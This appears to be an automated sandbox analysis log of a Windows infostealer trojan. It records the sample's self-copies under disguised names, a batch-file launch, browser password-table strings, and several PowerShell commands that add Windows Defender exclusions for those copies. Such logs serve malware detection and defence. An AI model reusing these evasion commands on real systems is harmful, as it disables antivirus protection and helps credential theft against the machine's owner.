Source: zZ1Y43bxxV.exe, 00000000.00000002.1757822050.000000001BC57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs zZ1Y43bxxV.exe
Source: zZ1Y43bxxV.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs zZ1Y43bxxV.exe
Source: zZ1Y43bxxV.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: zZ1Y43bxxV.exe, E32.cs Cryptographic APIs: 'TransformBlock'
Source: zZ1Y43bxxV.exe, E32.cs Cryptographic APIs: 'TransformFinalBlock'
Source: zZ1Y43bxxV.exe, E32.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: zZ1Y43bxxV.exe, s67.cs Base64 encoded string
Source: zZ1Y43bxxV.exe, 8B6.cs Base64 encoded string
Source: zZ1Y43bxxV.exe, 76n.cs Base64 encoded string
Source: zZ1Y43bxxV.exe, 7YK.cs Base64 encoded string
Source: zZ1Y43bxxV.exe, 52Z.cs Base64 encoded string
                          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@27/377@0/2
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File created: C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File created: C:\Users\user\Desktop\BtlmWJui.log
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:120:WilError_03
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Mutant created: NULL
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1908:120:WilError_03
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_03
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3272:120:WilError_03
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\8f8e651a25a945ecc390a45c0da3cfc0265e5ce1aa467481e904db157d1d950e
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File created: C:\Users\user\AppData\Local\Temp\4DGhR751jP
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat"
                          Source: zZ1Y43bxxV.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: zZ1Y43bxxV.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File read: C:\Users\desktop.ini
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: QABvI2F7Ec.16.dr, a6lvMwDMBM.16.dr, tdbkQMXWFq.16.dr, rdjAxIHsnm.16.dr, N5FvLANxEE.16.dr, QF5sneTT5D.16.dr, 5n2nK5Nw2R.16.dr, QWYGnjxtf3.16.dr, MF7TR74ULs.16.dr, xlXtFVAE2S.16.dr, LFpuzJcXE4.16.dr, ZRmoEyOg3P.16.dr, BPjM7kIgkI.16.dr, MI97f07IyB.16.dr, eKbHtOofpr.16.dr, X0yFLE4cjq.16.dr, 7BhKs2HjzD.16.dr, Zm6HpHvshC.16.dr, EVDQGhX1kB.16.dr, NAzm8sFcDu.16.dr, d2xbrqVTex.16.dr, yLNdaDy5GK.16.dr, tcvaOXrvDO.16.dr, LyzkFygtQK.16.dr, 48oche3RWV.16.dr, smgpPmVAYs.16.dr, wHU4Wp5cMx.16.dr, NS8NKbcqQj.16.dr, BbX9rYMvpu.16.dr, uOgota067b.16.dr, NaOziIAPNb.16.dr, 3knGgE73vK.16.dr, m48UHMrWqj.16.dr, Teu0BspRgc.16.dr, drvVyvpjkm.16.dr, JDBBAkcQbW.16.dr, 2N6o0NrB6I.16.dr, B5VLTpPk3f.16.dr, F1UGWHMQTA.16.dr, Ap65OdhL5o.16.dr, z94KxXW69i.16.dr, 4jt7zptSjj.16.dr, goMuilCRQw.16.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: zZ1Y43bxxV.exe Virustotal: Detection: 61%
                          Source: zZ1Y43bxxV.exe ReversingLabs: Detection: 78%
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File read: C:\Users\user\Desktop\zZ1Y43bxxV.exe
                          Source: unknown Process created: C:\Users\user\Desktop\zZ1Y43bxxV.exe "C:\Users\user\Desktop\zZ1Y43bxxV.exe"
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe'
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\mozilla maintenance service\logs\StartMenuExperienceHost.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\UserOOBEBroker.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat"
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe "C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe"
                          Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: mscoree.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: version.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: wldp.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: profapi.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: cryptsp.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: rsaenh.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: ktmw32.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: amsi.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: userenv.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: ntmarta.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: propsys.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: dlnashext.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: wpdshext.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: edputil.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: netutils.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: appresolver.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: bcp47langs.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: slc.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: sppc.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: mscoree.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: apphelp.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: kernel.appcore.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: version.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: windows.storage.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: wldp.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: profapi.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: cryptsp.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: rsaenh.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: cryptbase.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: sspicli.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: ktmw32.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: amsi.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: userenv.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: wbemcomn.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: iphlpapi.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: dnsapi.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: winnsi.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: rasapi32.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: rasman.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: rtutils.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: mswsock.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: winhttp.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: uxtheme.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: winmm.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: winmmbase.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: mmdevapi.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: devobj.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: ksuser.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: avrt.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: audioses.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: powrprof.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: umpdc.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: msacm32.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: midimap.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: edputil.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: dwrite.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: windowscodecs.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: ntmarta.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
